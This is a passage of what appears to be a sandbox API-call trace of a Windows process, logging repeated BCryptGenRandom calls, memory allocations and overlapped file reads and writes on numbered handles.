lpOverlapped=0x2fafc18) returned 1 [0209.335] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.335] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0209.335] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.335] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0209.336] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.336] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.336] free (_Block=0x3e305b8) [0209.336] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.336] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0209.336] free (_Block=0x1fa91d0) [0209.336] free (_Block=0x1fa2ed8) [0209.336] free (_Block=0x1fa90b8) [0209.336] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0209.337] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.337] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0209.337] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.338] CloseHandle (hObject=0x308) returned 1 [0209.338] free (_Block=0x3df0008) [0209.338] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.358] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x16e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0209.358] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.359] CloseHandle (hObject=0x170) returned 1 [0209.359] free (_Block=0x3d70450) [0209.359] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.367] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.367] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.367] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0209.367] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.368] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0209.368] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.368] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.368] free (_Block=0x3e305b8) [0209.368] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.368] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0209.368] free (_Block=0x1fa91d0) [0209.368] free (_Block=0x1fa2ed8) [0209.368] free (_Block=0x1fa90b8) [0209.368] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0209.369] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.369] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0209.369] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.377] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x186, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0209.377] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.377] CloseHandle (hObject=0x170) returned 1 [0209.378] free (_Block=0x3df0008) [0209.378] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.387] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.387] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.387] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0209.387] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.387] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.387] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0209.388] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.388] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.388] free (_Block=0x3e305b8) [0209.388] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.388] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0209.388] free (_Block=0x1fa91d0) [0209.388] free (_Block=0x1fa2ed8) [0209.388] free (_Block=0x1fa90b8) [0209.388] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0209.388] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.389] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0209.389] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.401] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x143, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0209.401] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.402] CloseHandle (hObject=0x170) returned 1 [0209.402] free (_Block=0x3df0008) [0209.402] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.439] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.439] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0209.439] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.440] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0209.440] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.440] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.440] free (_Block=0x3e305b8) [0209.440] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.440] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0209.440] free (_Block=0x1fa91d0) [0209.440] free (_Block=0x1fa2ed8) [0209.440] free (_Block=0x1fa90b8) [0209.440] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0209.441] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.441] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x490, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0209.441] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.510] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x482, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0209.511] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.515] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2fe, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0209.515] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.516] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x1c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0209.516] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.669] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0209.669] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.669] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0209.669] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.672] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xd1d, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0209.672] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.672] CloseHandle (hObject=0x170) returned 1 [0209.672] free (_Block=0x3d70450) [0209.672] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.686] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.686] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.686] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0209.686] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.687] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.687] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0209.687] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.687] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.687] free (_Block=0x3e305b8) [0209.687] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.687] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0209.687] free (_Block=0x1fa91d0) [0209.687] free (_Block=0x1fa2ed8) [0209.687] free (_Block=0x1fa90b8) [0209.687] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0209.688] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.708] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.709] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.709] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0209.709] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.709] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.709] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0209.709] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.709] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.709] free (_Block=0x3e305b8) [0209.709] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.709] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0209.710] free (_Block=0x1fa91d0) [0209.710] free (_Block=0x1fa2ed8) [0209.710] free (_Block=0x1fa90b8) [0209.710] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0209.710] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.730] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x148, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0209.730] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.741] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0209.741] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.752] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0209.752] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.762] WriteFile (in: hFile=0x3cc, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x670, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0209.762] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.767] WriteFile (in: hFile=0x238, lpBuffer=0x3fb00ec*, nNumberOfBytesToWrite=0x9d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8) returned 1 [0209.767] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.768] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0209.768] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.907] ReadFile (in: hFile=0xec, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x395, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0209.907] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.908] CloseHandle (hObject=0xec) returned 1 [0209.921] free (_Block=0x3f70048) [0209.922] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.922] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.923] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.923] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0209.923] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.924] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.924] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0209.924] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.924] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.924] free (_Block=0x3e305b8) [0209.924] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.924] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0209.925] free (_Block=0x1fa91d0) [0209.925] free (_Block=0x77d7a8) [0209.925] free (_Block=0x1fa90b8) [0209.925] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0209.925] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.936] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x395, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0209.936] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0209.947] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.947] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.947] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0209.948] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.948] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0209.948] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.948] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.948] free (_Block=0x3e305b8) [0209.948] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.949] calloc (_Count=0x82, 